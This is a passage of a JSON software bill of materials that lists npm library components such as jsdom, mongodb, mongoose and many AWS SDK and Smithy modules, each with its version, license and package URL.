MIT)"}],"purl":"pkg:npm/walk@2.3.9"},{"bom-ref":"111-foreachasync@3.0.0","type":"library","name":"foreachasync","version":"3.0.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/foreachasync@3.0.0"},{"bom-ref":"112-html-escaper@3.0.3","type":"library","name":"html-escaper","version":"3.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/html-escaper@3.0.3"},{"bom-ref":"113-humanize-ms@1.0.1","type":"library","name":"humanize-ms","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/humanize-ms@1.0.1"},{"bom-ref":"114-ms@0.6.2","type":"library","name":"ms","version":"0.6.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ms@0.6.2"},{"bom-ref":"115-jquery@2.2.4","type":"library","name":"jquery","version":"2.2.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jquery@2.2.4"},{"bom-ref":"116-jsdom@27.2.0","type":"library","name":"jsdom","version":"27.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jsdom@27.2.0"},{"bom-ref":"117-@acemir/cssom@0.9.23","type":"library","group":"@acemir","name":"@acemir/cssom","version":"0.9.23","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40acemir/cssom@0.9.23"},{"bom-ref":"118-@asamuzakjp/dom-selector@6.7.4","type":"library","group":"@asamuzakjp","name":"@asamuzakjp/dom-selector","version":"6.7.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40asamuzakjp/dom-selector@6.7.4"},{"bom-ref":"119-@asamuzakjp/nwsapi@2.3.9","type":"library","group":"@asamuzakjp","name":"@asamuzakjp/nwsapi","version":"2.3.9","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40asamuzakjp/nwsapi@2.3.9"},{"bom-ref":"120-bidi-js@1.0.3","type":"library","name":"bidi-js","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bidi-js@1.0.3"},{"bom-ref":"121-require-from-string@2.0.2","type":"library","name":"require-from-string","version":"2.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/require-from-string@2.0.2"},{"bom-ref":"122-css-tree@3.1.0","type":"library","name":"css-tree","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/css-tree@3.1.0"},{"bom-ref":"123-mdn-data@2.12.2","type":"library","name":"mdn-data","version":"2.12.2","licenses":[{"expression":"CC0-1.0"}],"purl":"pkg:npm/mdn-data@2.12.2"},{"bom-ref":"124-source-map-js@1.2.1","type":"library","name":"source-map-js","version":"1.2.1","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/source-map-js@1.2.1"},{"bom-ref":"125-is-potential-custom-element-name@1.0.1","type":"library","name":"is-potential-custom-element-name","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-potential-custom-element-name@1.0.1"},{"bom-ref":"126-lru-cache@11.2.2","type":"library","name":"lru-cache","version":"11.2.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/lru-cache@11.2.2"},{"bom-ref":"127-cssstyle@5.3.3","type":"library","name":"cssstyle","version":"5.3.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cssstyle@5.3.3"},{"bom-ref":"128-@asamuzakjp/css-color@4.1.0","type":"library","group":"@asamuzakjp","name":"@asamuzakjp/css-color","version":"4.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40asamuzakjp/css-color@4.1.0"},{"bom-ref":"129-@csstools/css-calc@2.1.4","type":"library","group":"@csstools","name":"@csstools/css-calc","version":"2.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40csstools/css-calc@2.1.4"},{"bom-ref":"130-@csstools/css-color-parser@3.1.0","type":"library","group":"@csstools","name":"@csstools/css-color-parser","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40csstools/css-color-parser@3.1.0"},{"bom-ref":"131-@csstools/color-helpers@5.1.0","type":"library","group":"@csstools","name":"@csstools/color-helpers","version":"5.1.0","licenses":[{"expression":"MIT-0"}],"purl":"pkg:npm/%40csstools/color-helpers@5.1.0"},{"bom-ref":"132-@csstools/css-parser-algorithms@3.0.5","type":"library","group":"@csstools","name":"@csstools/css-parser-algorithms","version":"3.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40csstools/css-parser-algorithms@3.0.5"},{"bom-ref":"133-@csstools/css-tokenizer@3.0.4","type":"library","group":"@csstools","name":"@csstools/css-tokenizer","version":"3.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40csstools/css-tokenizer@3.0.4"},{"bom-ref":"134-@csstools/css-syntax-patches-for-csstree@1.0.16","type":"library","group":"@csstools","name":"@csstools/css-syntax-patches-for-csstree","version":"1.0.16","licenses":[{"expression":"MIT-0"}],"purl":"pkg:npm/%40csstools/css-syntax-patches-for-csstree@1.0.16"},{"bom-ref":"135-data-urls@6.0.0","type":"library","name":"data-urls","version":"6.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/data-urls@6.0.0"},{"bom-ref":"136-whatwg-mimetype@4.0.0","type":"library","name":"whatwg-mimetype","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/whatwg-mimetype@4.0.0"},{"bom-ref":"137-whatwg-url@15.1.0","type":"library","name":"whatwg-url","version":"15.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/whatwg-url@15.1.0"},{"bom-ref":"138-tr46@6.0.0","type":"library","name":"tr46","version":"6.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tr46@6.0.0"},{"bom-ref":"139-punycode@2.3.1","type":"library","name":"punycode","version":"2.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/punycode@2.3.1"},{"bom-ref":"140-webidl-conversions@8.0.0","type":"library","name":"webidl-conversions","version":"8.0.0","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/webidl-conversions@8.0.0"},{"bom-ref":"141-decimal.js@10.6.0","type":"library","name":"decimal.js","version":"10.6.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/decimal.js@10.6.0"},{"bom-ref":"142-html-encoding-sniffer@4.0.0","type":"library","name":"html-encoding-sniffer","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/html-encoding-sniffer@4.0.0"},{"bom-ref":"143-whatwg-encoding@3.1.1","type":"library","name":"whatwg-encoding","version":"3.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/whatwg-encoding@3.1.1"},{"bom-ref":"144-iconv-lite@0.6.3","type":"library","name":"iconv-lite","version":"0.6.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/iconv-lite@0.6.3"},{"bom-ref":"145-safer-buffer@2.1.2","type":"library","name":"safer-buffer","version":"2.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/safer-buffer@2.1.2"},{"bom-ref":"146-http-proxy-agent@7.0.2","type":"library","name":"http-proxy-agent","version":"7.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/http-proxy-agent@7.0.2"},{"bom-ref":"147-agent-base@7.1.4","type":"library","name":"agent-base","version":"7.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/agent-base@7.1.4"},{"bom-ref":"148-debug@4.4.3","type":"library","name":"debug","version":"4.4.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/debug@4.4.3"},{"bom-ref":"149-ms@2.1.3","type":"library","name":"ms","version":"2.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ms@2.1.3"},{"bom-ref":"150-https-proxy-agent@7.0.6","type":"library","name":"https-proxy-agent","version":"7.0.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/https-proxy-agent@7.0.6"},{"bom-ref":"151-parse5@8.0.0","type":"library","name":"parse5","version":"8.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parse5@8.0.0"},{"bom-ref":"152-entities@6.0.1","type":"library","name":"entities","version":"6.0.1","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/entities@6.0.1"},{"bom-ref":"153-saxes@6.0.0","type":"library","name":"saxes","version":"6.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/saxes@6.0.0"},{"bom-ref":"154-xmlchars@2.2.0","type":"library","name":"xmlchars","version":"2.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/xmlchars@2.2.0"},{"bom-ref":"155-symbol-tree@3.2.4","type":"library","name":"symbol-tree","version":"3.2.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/symbol-tree@3.2.4"},{"bom-ref":"156-tough-cookie@6.0.0","type":"library","name":"tough-cookie","version":"6.0.0","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/tough-cookie@6.0.0"},{"bom-ref":"157-tldts@7.0.18","type":"library","name":"tldts","version":"7.0.18","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tldts@7.0.18"},{"bom-ref":"158-tldts-core@7.0.18","type":"library","name":"tldts-core","version":"7.0.18","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tldts-core@7.0.18"},{"bom-ref":"159-w3c-xmlserializer@5.0.0","type":"library","name":"w3c-xmlserializer","version":"5.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/w3c-xmlserializer@5.0.0"},{"bom-ref":"160-xml-name-validator@5.0.0","type":"library","name":"xml-name-validator","version":"5.0.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/xml-name-validator@5.0.0"},{"bom-ref":"161-ws@8.18.3","type":"library","name":"ws","version":"8.18.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ws@8.18.3"},{"bom-ref":"162-lodash@4.17.4","type":"library","name":"lodash","version":"4.17.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lodash@4.17.4"},{"bom-ref":"163-marked@0.3.5","type":"library","name":"marked","version":"0.3.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/marked@0.3.5"},{"bom-ref":"164-method-override@3.0.0","type":"library","name":"method-override","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/method-override@3.0.0"},{"bom-ref":"165-debug@3.1.0","type":"library","name":"debug","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/debug@3.1.0"},{"bom-ref":"166-vary@1.1.2","type":"library","name":"vary","version":"1.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/vary@1.1.2"},{"bom-ref":"167-moment@2.15.1","type":"library","name":"moment","version":"2.15.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/moment@2.15.1"},{"bom-ref":"168-mongodb@3.5.9","type":"library","name":"mongodb","version":"3.5.9","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/mongodb@3.5.9"},{"bom-ref":"169-bl@2.2.0","type":"library","name":"bl","version":"2.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bl@2.2.0"},{"bom-ref":"170-readable-stream@2.3.7","type":"library","name":"readable-stream","version":"2.3.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/readable-stream@2.3.7"},{"bom-ref":"171-core-util-is@1.0.2","type":"library","name":"core-util-is","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/core-util-is@1.0.2"},{"bom-ref":"172-isarray@1.0.0","type":"library","name":"isarray","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/isarray@1.0.0"},{"bom-ref":"173-process-nextick-args@2.0.0","type":"library","name":"process-nextick-args","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/process-nextick-args@2.0.0"},{"bom-ref":"174-safe-buffer@5.1.2","type":"library","name":"safe-buffer","version":"5.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/safe-buffer@5.1.2"},{"bom-ref":"175-string_decoder@1.1.1","type":"library","name":"string_decoder","version":"1.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/string_decoder@1.1.1"},{"bom-ref":"176-util-deprecate@1.0.2","type":"library","name":"util-deprecate","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/util-deprecate@1.0.2"},{"bom-ref":"177-safe-buffer@5.2.0","type":"library","name":"safe-buffer","version":"5.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/safe-buffer@5.2.0"},{"bom-ref":"178-bson@1.1.4","type":"library","name":"bson","version":"1.1.4","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/bson@1.1.4"},{"bom-ref":"179-denque@1.4.1","type":"library","name":"denque","version":"1.4.1","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/denque@1.4.1"},{"bom-ref":"180-require_optional@1.0.1","type":"library","name":"require_optional","version":"1.0.1","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/require_optional@1.0.1"},{"bom-ref":"181-resolve-from@2.0.0","type":"library","name":"resolve-from","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/resolve-from@2.0.0"},{"bom-ref":"182-semver@5.7.0","type":"library","name":"semver","version":"5.7.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/semver@5.7.0"},{"bom-ref":"183-saslprep@1.0.3","type":"library","name":"saslprep","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/saslprep@1.0.3"},{"bom-ref":"184-sparse-bitfield@3.0.3","type":"library","name":"sparse-bitfield","version":"3.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/sparse-bitfield@3.0.3"},{"bom-ref":"185-memory-pager@1.5.0","type":"library","name":"memory-pager","version":"1.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/memory-pager@1.5.0"},{"bom-ref":"186-mongoose@6.13.6","type":"library","name":"mongoose","version":"6.13.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mongoose@6.13.6"},{"bom-ref":"187-bson@4.7.2","type":"library","name":"bson","version":"4.7.2","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/bson@4.7.2"},{"bom-ref":"188-buffer@5.7.1","type":"library","name":"buffer","version":"5.7.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/buffer@5.7.1"},{"bom-ref":"189-base64-js@1.5.1","type":"library","name":"base64-js","version":"1.5.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/base64-js@1.5.1"},{"bom-ref":"190-ieee754@1.1.13","type":"library","name":"ieee754","version":"1.1.13","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/ieee754@1.1.13"},{"bom-ref":"191-kareem@2.5.1","type":"library","name":"kareem","version":"2.5.1","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/kareem@2.5.1"},{"bom-ref":"192-mongodb@4.17.2","type":"library","name":"mongodb","version":"4.17.2","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/mongodb@4.17.2"},{"bom-ref":"193-mongodb-connection-string-url@2.6.0","type":"library","name":"mongodb-connection-string-url","version":"2.6.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/mongodb-connection-string-url@2.6.0"},{"bom-ref":"194-@types/whatwg-url@8.2.2","type":"library","group":"@types","name":"@types/whatwg-url","version":"8.2.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40types/whatwg-url@8.2.2"},{"bom-ref":"195-@types/node@13.1.7","type":"library","group":"@types","name":"@types/node","version":"13.1.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40types/node@13.1.7"},{"bom-ref":"196-@types/webidl-conversions@7.0.3","type":"library","group":"@types","name":"@types/webidl-conversions","version":"7.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40types/webidl-conversions@7.0.3"},{"bom-ref":"197-whatwg-url@11.0.0","type":"library","name":"whatwg-url","version":"11.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/whatwg-url@11.0.0"},{"bom-ref":"198-tr46@3.0.0","type":"library","name":"tr46","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/tr46@3.0.0"},{"bom-ref":"199-webidl-conversions@7.0.0","type":"library","name":"webidl-conversions","version":"7.0.0","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/webidl-conversions@7.0.0"},{"bom-ref":"200-socks@2.8.7","type":"library","name":"socks","version":"2.8.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/socks@2.8.7"},{"bom-ref":"201-ip-address@10.1.0","type":"library","name":"ip-address","version":"10.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ip-address@10.1.0"},{"bom-ref":"202-smart-buffer@4.2.0","type":"library","name":"smart-buffer","version":"4.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/smart-buffer@4.2.0"},{"bom-ref":"203-@aws-sdk/credential-providers@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-providers","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-providers@3.972.0"},{"bom-ref":"204-@aws-sdk/client-cognito-identity@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/client-cognito-identity","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/client-cognito-identity@3.972.0"},{"bom-ref":"205-@aws-crypto/sha256-browser@5.2.0","type":"library","group":"@aws-crypto","name":"@aws-crypto/sha256-browser","version":"5.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-crypto/sha256-browser@5.2.0"},{"bom-ref":"206-@aws-crypto/sha256-js@5.2.0","type":"library","group":"@aws-crypto","name":"@aws-crypto/sha256-js","version":"5.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-crypto/sha256-js@5.2.0"},{"bom-ref":"207-@aws-crypto/util@5.2.0","type":"library","group":"@aws-crypto","name":"@aws-crypto/util","version":"5.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-crypto/util@5.2.0"},{"bom-ref":"208-@aws-sdk/types@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/types","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/types@3.972.0"},{"bom-ref":"209-@smithy/types@4.12.0","type":"library","group":"@smithy","name":"@smithy/types","version":"4.12.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/types@4.12.0"},{"bom-ref":"210-tslib@2.8.1","type":"library","name":"tslib","version":"2.8.1","licenses":[{"expression":"0BSD"}],"purl":"pkg:npm/tslib@2.8.1"},{"bom-ref":"211-@smithy/util-utf8@2.3.0","type":"library","group":"@smithy","name":"@smithy/util-utf8","version":"2.3.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-utf8@2.3.0"},{"bom-ref":"212-@smithy/util-buffer-from@2.2.0","type":"library","group":"@smithy","name":"@smithy/util-buffer-from","version":"2.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-buffer-from@2.2.0"},{"bom-ref":"213-@smithy/is-array-buffer@2.2.0","type":"library","group":"@smithy","name":"@smithy/is-array-buffer","version":"2.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/is-array-buffer@2.2.0"},{"bom-ref":"214-@aws-crypto/supports-web-crypto@5.2.0","type":"library","group":"@aws-crypto","name":"@aws-crypto/supports-web-crypto","version":"5.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-crypto/supports-web-crypto@5.2.0"},{"bom-ref":"215-@aws-sdk/util-locate-window@3.965.3","type":"library","group":"@aws-sdk","name":"@aws-sdk/util-locate-window","version":"3.965.3","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/util-locate-window@3.965.3"},{"bom-ref":"216-@aws-sdk/core@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/core","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/core@3.972.0"},{"bom-ref":"217-@aws-sdk/xml-builder@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/xml-builder","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/xml-builder@3.972.0"},{"bom-ref":"218-fast-xml-parser@5.2.5","type":"library","name":"fast-xml-parser","version":"5.2.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fast-xml-parser@5.2.5"},{"bom-ref":"219-strnum@2.1.2","type":"library","name":"strnum","version":"2.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strnum@2.1.2"},{"bom-ref":"220-@smithy/core@3.21.0","type":"library","group":"@smithy","name":"@smithy/core","version":"3.21.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/core@3.21.0"},{"bom-ref":"221-@smithy/middleware-serde@4.2.9","type":"library","group":"@smithy","name":"@smithy/middleware-serde","version":"4.2.9","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/middleware-serde@4.2.9"},{"bom-ref":"222-@smithy/protocol-http@5.3.8","type":"library","group":"@smithy","name":"@smithy/protocol-http","version":"5.3.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/protocol-http@5.3.8"},{"bom-ref":"223-@smithy/util-base64@4.3.0","type":"library","group":"@smithy","name":"@smithy/util-base64","version":"4.3.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-base64@4.3.0"},{"bom-ref":"224-@smithy/util-buffer-from@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-buffer-from","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-buffer-from@4.2.0"},{"bom-ref":"225-@smithy/is-array-buffer@4.2.0","type":"library","group":"@smithy","name":"@smithy/is-array-buffer","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/is-array-buffer@4.2.0"},{"bom-ref":"226-@smithy/util-utf8@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-utf8","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-utf8@4.2.0"},{"bom-ref":"227-@smithy/util-body-length-browser@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-body-length-browser","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-body-length-browser@4.2.0"},{"bom-ref":"228-@smithy/util-middleware@4.2.8","type":"library","group":"@smithy","name":"@smithy/util-middleware","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-middleware@4.2.8"},{"bom-ref":"229-@smithy/util-stream@4.5.10","type":"library","group":"@smithy","name":"@smithy/util-stream","version":"4.5.10","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-stream@4.5.10"},{"bom-ref":"230-@smithy/fetch-http-handler@5.3.9","type":"library","group":"@smithy","name":"@smithy/fetch-http-handler","version":"5.3.9","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/fetch-http-handler@5.3.9"},{"bom-ref":"231-@smithy/querystring-builder@4.2.8","type":"library","group":"@smithy","name":"@smithy/querystring-builder","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/querystring-builder@4.2.8"},{"bom-ref":"232-@smithy/util-uri-escape@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-uri-escape","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-uri-escape@4.2.0"},{"bom-ref":"233-@smithy/node-http-handler@4.4.8","type":"library","group":"@smithy","name":"@smithy/node-http-handler","version":"4.4.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/node-http-handler@4.4.8"},{"bom-ref":"234-@smithy/abort-controller@4.2.8","type":"library","group":"@smithy","name":"@smithy/abort-controller","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/abort-controller@4.2.8"},{"bom-ref":"235-@smithy/util-hex-encoding@4.2.0","type":"library","group":"@smithy","name":"@smithy/util-hex-encoding","version":"4.2.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/util-hex-encoding@4.2.0"},{"bom-ref":"236-@smithy/uuid@1.1.0","type":"library","group":"@smithy","name":"@smithy/uuid","version":"1.1.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/uuid@1.1.0"},{"bom-ref":"237-@smithy/node-config-provider@4.3.8","type":"library","group":"@smithy","name":"@smithy/node-config-provider","version":"4.3.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/node-config-provider@4.3.8"},{"bom-ref":"238-@smithy/property-provider@4.2.8","type":"library","group":"@smithy","name":"@smithy/property-provider","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/property-provider@4.2.8"},{"bom-ref":"239-@smithy/shared-ini-file-loader@4.4.3","type":"library","group":"@smithy","name":"@smithy/shared-ini-file-loader","version":"4.4.3","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/shared-ini-file-loader@4.4.3"},{"bom-ref":"240-@smithy/signature-v4@5.3.8","type":"library","group":"@smithy","name":"@smithy/signature-v4","version":"5.3.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/signature-v4@5.3.8"},{"bom-ref":"241-@smithy/smithy-client@4.10.11","type":"library","group":"@smithy","name":"@smithy/smithy-client","version":"4.10.11","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/smithy-client@4.10.11"},{"bom-ref":"242-@smithy/middleware-endpoint@4.4.10","type":"library","group":"@smithy","name":"@smithy/middleware-endpoint","version":"4.4.10","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/middleware-endpoint@4.4.10"},{"bom-ref":"243-@smithy/url-parser@4.2.8","type":"library","group":"@smithy","name":"@smithy/url-parser","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/url-parser@4.2.8"},{"bom-ref":"244-@smithy/querystring-parser@4.2.8","type":"library","group":"@smithy","name":"@smithy/querystring-parser","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/querystring-parser@4.2.8"},{"bom-ref":"245-@smithy/middleware-stack@4.2.8","type":"library","group":"@smithy","name":"@smithy/middleware-stack","version":"4.2.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40smithy/middleware-stack@4.2.8"},{"bom-ref":"246-@aws-sdk/credential-provider-node@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-node","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-node@3.972.0"},{"bom-ref":"247-@aws-sdk/credential-provider-env@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-env","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-env@3.972.0"},{"bom-ref":"248-@aws-sdk/credential-provider-http@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-http","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-http@3.972.0"},{"bom-ref":"249-@aws-sdk/credential-provider-ini@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-ini","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-ini@3.972.0"},{"bom-ref":"250-@aws-sdk/credential-provider-login@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/credential-provider-login","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/credential-provider-login@3.972.0"},{"bom-ref":"251-@aws-sdk/nested-clients@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/nested-clients","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/nested-clients@3.972.0"},{"bom-ref":"252-@aws-sdk/middleware-host-header@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/middleware-host-header","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/middleware-host-header@3.972.0"},{"bom-ref":"253-@aws-sdk/middleware-logger@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/middleware-logger","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/middleware-logger@3.972.0"},{"bom-ref":"254-@aws-sdk/middleware-recursion-detection@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/middleware-recursion-detection","version":"3.972.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws-sdk/middleware-recursion-detection@3.972.0"},{"bom-ref":"255-@aws/lambda-invoke-store@0.2.3","type":"library","group":"@aws","name":"@aws/lambda-invoke-store","version":"0.2.3","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/%40aws/lambda-invoke-store@0.2.3"},{"bom-ref":"256-@aws-sdk/middleware-user-agent@3.972.0","type":"library","group":"@aws-sdk","name":"@aws-sdk/middleware-user-agent","version":"3.972.0","licenses":[{"expression":"Apache-2.0